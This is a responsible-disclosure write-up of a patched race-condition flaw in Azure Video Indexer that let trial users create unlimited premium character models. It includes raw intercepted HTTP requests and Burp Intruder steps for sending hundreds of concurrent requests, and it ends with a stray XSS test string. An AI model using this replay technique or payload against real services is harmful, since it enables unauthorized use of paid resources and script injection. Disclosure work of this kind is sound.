Race Condition vulnerability in Azure Video Indexer allowed trial account users use Advance / Premium feature
VULNERABILITY DESCRIPTION
The Microsoft Azure's services App Videoindexer.ai ( https://vi.microsoft.com/en-us) has a feature known as "Animated Characters" located in "Model Customizations" tab. This important feature allows the Videoindexer customers to add Character models which are used to identify and group animated characters when uploading content.
Based on the Business Logic of Azure Video Indexer - It only allows one model on the the trial account. as mentioned on the "Animated characters (preview)" tab itself.
During the security research , initially the endpoint which adds the model was found to working as expected validation on client & server side as well exists.
After further digging into this endpoint a race condition vulnerability was discovered allowing an trial user to add N number of Animated characters models to his trial account bypassing the complete critical business logic of restricting trial users from using premium features/utilizing premium resources and basically use it for free.
RISK BREAKDOWN
-
Risk: High / Important
-
Difficulty to Exploit: Medium
AFFECTED URLS
https://api.videoindexer.ai/trial/accounts/$ACCOUNT_ID/Customization/AnimationModels?accesstoken=STEPS TO REPRODUCE
Step 1. Login using any trial account (e.g vikzsharma@twitter.com) in Videoindexer.aiStep 2. Navigate to the left tab Model customizations -> Animated Characters
Step 3. Observe , It is strictly mentioned "You can add one model on a trial account".
Step 4. Add a model in the account & observe the validation to allow only one model for trial account users is implemented on the client as well as server side.
Step 5. Start fresh, delete the existing model from the trial account. Navigate to the left tab again Model customizations -> Animated Characters -> Click on Add Model
Step 6. Enable any proxy tool (e.g Burpsuite,mitmproxy) in browser , Enter model name & intercept the POST request ( refer below) & send it to Burp Intruder and then drop the request.
```
POST /trial/accounts/0c2d9f08-b2d9-4b71-9c4a-1e9d32a70a6a/Customization/AnimationModels HTTP/1.1
Host: api.videoindexer.ai
Content-Length: 27
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="102", "Google Chrome";v="102"
X-Ms-Client-Session-Id: sc9sx7oP0cFv/1o9ffkcUk
Sec-Ch-Ua-Mobile: ?0
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Ms-Client-Request-Id: 49314542-bec2-3930-3a83-5f5667789332
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://www.videoindexer.ai
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.videoindexer.ai/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"name":"Imfirstmodel"}
```
POST /trial/accounts/0c2d9f08-b2d9-4b71-9c4a-1e9d32a70a6a/Customization/AnimationModels HTTP/1.1
Host: api.videoindexer.ai
Content-Length: 27
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="102", "Google Chrome";v="102"
X-Ms-Client-Session-Id: sc9sx7oP0cFv/1o9ffkcUk
Sec-Ch-Ua-Mobile: ?0
Content-Type: application/json
Accept: application/json, text/plain, */*
X-Ms-Client-Request-Id: 49314542-bec2-3930-3a83-5f5667789332
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://www.videoindexer.ai
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.videoindexer.ai/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"name":"Imfirstmodel"}
```
Step 6. Configure the Burp Intruder with Maxconcurrent request as 300 or 500 or 600 , Add the payload position to the value of "name" parameter which is "Imfirstmodel" in our e.g. $Imfirstmodel$ . In the payloads option you can set any type of your choice numeric or alphanumeric.
For,testing purpose send 500-1000 names numeric or alphanumeric concurrently.
Step 7. Observe , threads use the same shared memory to update the values of variables on server side ,Therefore we are successful to bypass the security mechanism / authorization in place using the vulnerability known as Race Condition and add N number of models in an trial account.
The intruder has many 201 responses proving N number of the model creations in a trial account bypassing the critical business logic restricting trial users of Azure Video Indexer.
- Trial account with many models :
IMPACT
1. This race condition vulnerability allowed an Attacker user to Add N number of Models to his/her "Free Trial Account" to be specific which is an advance paid feature of Azure as mentioned in the documentation. (https://docs.microsoft.com/en-us/azure/azure-video-indexer/animated-characters-recognition#limitations).
2. Financial & as well as reputational loss.
TIMELINES
- Jun 18, 2022 - Case Opened
- Aug 22, 2022 - Issue confirmed - > Changed to Develop Status
- September , 2022 - Fix / HOF.
Follow me @vikzsharma on Twitter for updates on write ups.
“>alert(1)
jji